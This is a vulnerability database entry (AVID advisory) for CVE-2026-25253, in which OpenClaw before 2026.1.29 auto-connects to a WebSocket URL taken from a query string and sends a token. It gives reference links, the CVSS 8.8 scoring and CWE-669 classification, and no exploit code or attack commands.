We use cookies to improve your experience on our site.
AVID-2026-R0217
Description
Vulnerability CVE-2026-25253
Details
OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value.
References
- NVD entry
- https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
- https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq
- https://openclaw.ai/blog
- https://ethiack.com/news/blog/one-click-rce-moltbot
- https://x.com/0xacb/status/2016913750557651228
- OpenClawCVEs repository
Affected or Relevant Artifacts
- Developer: OpenClaw
- Deployer: OpenClaw
- Artifact Details:
| Type | Name |
|---|---|
| System | OpenClaw |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CVSS
| Version | 3.1 |
| Vector String | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Base Score | 8.8 |
| Base Severity | 🔴 High |
| Attack Vector | NETWORK |
| Attack Complexity | 🟢 Low |
| Privileges Required | NONE |
| User Interaction | REQUIRED |
| Scope | UNCHANGED |
| Confidentiality Impact | 🔴 High |
| Integrity Impact | 🔴 High |
| Availability Impact | 🔴 High |
CWE
| ID | Description |
|---|---|
| CWE-669 | CWE-669 Incorrect Resource Transfer Between Spheres |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2026-02-01
- Version: 0.3.2
- AVID Entry